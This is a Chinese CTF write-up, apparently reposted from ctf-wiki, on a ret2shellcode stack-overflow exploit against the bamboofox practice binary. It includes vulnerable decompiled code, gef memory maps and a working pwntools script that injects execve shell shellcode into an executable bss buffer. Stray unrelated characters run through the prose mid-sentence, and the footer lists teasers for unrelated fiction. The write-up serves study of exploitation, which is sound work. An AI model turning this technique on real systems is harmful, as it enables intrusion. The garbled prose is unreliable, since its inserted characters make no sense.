棧溢出 簡本ROP ret2shellcode

ret2shellcode

原理

ret2shellcode,即控制程序執(zhí)行 shellcode代碼摸屠。shellcode 指的是用于完成某個功能的匯編代碼帆吻,常見的功能主要是獲取目標系統(tǒng)的 shell展运。一般來說您访,shellcode 需要我們自己填充铅忿。這其實是另外一種典型的利用方法,即此時我們需要自己去填充一些可執(zhí)行的代碼灵汪。

在棧溢出的基礎(chǔ)上檀训,要想執(zhí)行 shellcode柑潦,需要對應(yīng)的 binary 在運行時,shellcode 所在的區(qū)域具有可執(zhí)行權(quán)限肢扯。

例子

這里我們以 bamboofox 中的 ret2shellcode 為例

點擊下載: ret2shellcode

首先檢測程序開啟的保護

1

可以看出源程序幾乎沒有開啟任何保護妒茬,并且有可讀,可寫蔚晨,可執(zhí)行段。我們再使用 IDA 看一下程序

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [sp+1Ch] [bp-64h]@1

  setvbuf(stdout, 0, 2, 0);
  setvbuf(stdin, 0, 1, 0);
  puts("No system for you this time !!!");
  gets((char *)&v4);
  strncpy(buf2, (const char *)&v4, 0x64u);
  printf("bye bye ~");
  return 0;
}

這時肛循,我們簡單的調(diào)試下程序铭腕,看看這一個 bss 段是否可執(zhí)行。

gef?  b main
Breakpoint 1 at 0x8048536: file ret2shellcode.c, line 8.
gef?  r
Starting program: /mnt/hgfs/Hack/CTF-Learn/pwn/stack/example/ret2shellcode/ret2shellcode 
Breakpoint 1, main () at ret2shellcode.c:8
8       setvbuf(stdout, 0LL, 2, 0LL);
─────────────────────────────────────────────────────────────────────[ source:ret2shellcode.c+8 ]────
      6  int main(void)
      7  {
 →    8      setvbuf(stdout, 0LL, 2, 0LL);
      9      setvbuf(stdin, 0LL, 1, 0LL);
     10  
─────────────────────────────────────────────────────────────────────[ trace ]────
[#0] 0x8048536 → Name: main()
─────────────────────────────────────────────────────────────────────────────────────────────────────
gef?  vmmap 
Start      End        Offset     Perm Path
0x08048000 0x08049000 0x00000000 r-x /mnt/hgfs/Hack/CTF-Learn/pwn/stack/example/ret2shellcode/ret2shellcode
0x08049000 0x0804a000 0x00000000 r-x /mnt/hgfs/Hack/CTF-Learn/pwn/stack/example/ret2shellcode/ret2shellcode
0x0804a000 0x0804b000 0x00001000 rwx /mnt/hgfs/Hack/CTF-Learn/pwn/stack/example/ret2shellcode/ret2shellcode
0xf7dfc000 0xf7fab000 0x00000000 r-x /lib/i386-linux-gnu/libc-2.23.so
0xf7fab000 0xf7fac000 0x001af000 --- /lib/i386-linux-gnu/libc-2.23.so
0xf7fac000 0xf7fae000 0x001af000 r-x /lib/i386-linux-gnu/libc-2.23.so
0xf7fae000 0xf7faf000 0x001b1000 rwx /lib/i386-linux-gnu/libc-2.23.so
0xf7faf000 0xf7fb2000 0x00000000 rwx 
0xf7fd3000 0xf7fd5000 0x00000000 rwx 
0xf7fd5000 0xf7fd7000 0x00000000 r-- [vvar]
0xf7fd7000 0xf7fd9000 0x00000000 r-x [vdso]
0xf7fd9000 0xf7ffb000 0x00000000 r-x /lib/i386-linux-gnu/ld-2.23.so
0xf7ffb000 0xf7ffc000 0x00000000 rwx 
0xf7ffc000 0xf7ffd000 0x00022000 r-x /lib/i386-linux-gnu/ld-2.23.so
0xf7ffd000 0xf7ffe000 0x00023000 rwx /lib/i386-linux-gnu/ld-2.23.so
0xfffdd000 0xffffe000 0x00000000 rwx [stack]

通過 vmmap多糠,我們可以看到 bss 段對應(yīng)的段具有可執(zhí)行權(quán)限

0x0804a000 0x0804b000 0x00001000 rwx /mnt/hgfs/Hack/CTF-Learn/pwn/stack/example/ret2shellcode/ret2shellcode

那么這次我們就控制程序執(zhí)行 shellcode累舷,也就是讀入 shellcode,然后控制程序執(zhí)行 bss 段處的 shellcode夹孔。其中被盈,相應(yīng)的偏移計算類似于 ret2text 中的例子。

具體的 payload 如下

from pwn import *
sh = process('./ret2shellcode')
shellcode = asm(shellcraft.sh())
buf2_addr = 0x804a080
sh.sendline(shellcode.ljust(112, 'A') + p32(buf2_addr))
sh.interactive()

題目

  • sniperoj-pwn100-shellcode-x86-64
    轉(zhuǎn)載自ctfwiki

期末考了

偷下懶

到返回地址的距離求得方法和上文相同

科普

pwntools使用簡介

犯的錯誤

棧的概念理解錯

果然pwn是個很恐怖的東東

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末搭伤,一起剝皮案震驚了整個濱河市只怎,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌怜俐,老刑警劉巖身堡,帶你破解...
    沈念sama閱讀 218,204評論 6 506
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異拍鲤,居然都是意外死亡贴谎,警方通過查閱死者的電腦和手機,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,091評論 3 395
  • 文/潘曉璐 我一進店門季稳,熙熙樓的掌柜王于貴愁眉苦臉地迎上來擅这,“玉大人,你說我怎么就攤上這事景鼠≈亵幔” “怎么了?”我有些...
    開封第一講書人閱讀 164,548評論 0 354
  • 文/不壞的土叔 我叫張陵莲蜘,是天一觀的道長谭确。 經(jīng)常有香客問我,道長票渠,這世上最難降的妖魔是什么逐哈? 我笑而不...
    開封第一講書人閱讀 58,657評論 1 293
  • 正文 為了忘掉前任,我火速辦了婚禮问顷,結(jié)果婚禮上昂秃,老公的妹妹穿的比我還像新娘禀梳。我一直安慰自己,他們只是感情好肠骆,可當我...
    茶點故事閱讀 67,689評論 6 392
  • 文/花漫 我一把揭開白布算途。 她就那樣靜靜地躺著,像睡著了一般蚀腿。 火紅的嫁衣襯著肌膚如雪嘴瓤。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 51,554評論 1 305
  • 那天莉钙,我揣著相機與錄音廓脆,去河邊找鬼。 笑死磁玉,一個胖子當著我的面吹牛停忿,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播蚊伞,決...
    沈念sama閱讀 40,302評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼席赂,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了时迫?” 一聲冷哼從身側(cè)響起颅停,我...
    開封第一講書人閱讀 39,216評論 0 276
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎别垮,沒想到半個月后便监,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 45,661評論 1 314
  • 正文 獨居荒郊野嶺守林人離奇死亡碳想,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,851評論 3 336
  • 正文 我和宋清朗相戀三年烧董,在試婚紗的時候發(fā)現(xiàn)自己被綠了。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片胧奔。...
    茶點故事閱讀 39,977評論 1 348
  • 序言:一個原本活蹦亂跳的男人離奇死亡逊移,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出龙填,到底是詐尸還是另有隱情胳泉,我是刑警寧澤,帶...
    沈念sama閱讀 35,697評論 5 347
  • 正文 年R本政府宣布岩遗,位于F島的核電站扇商,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏宿礁。R本人自食惡果不足惜案铺,卻給世界環(huán)境...
    茶點故事閱讀 41,306評論 3 330
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望梆靖。 院中可真熱鬧控汉,春花似錦笔诵、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,898評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至街佑,卻和暖如春谢翎,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背舆乔。 一陣腳步聲響...
    開封第一講書人閱讀 33,019評論 1 270
  • 我被黑心中介騙來泰國打工岳服, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留,地道東北人希俩。 一個月前我還...
    沈念sama閱讀 48,138評論 3 370
  • 正文 我出身青樓,卻偏偏與公主長得像纲辽,于是被迫代替她去往敵國和親颜武。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 44,927評論 2 355

推薦閱讀更多精彩內(nèi)容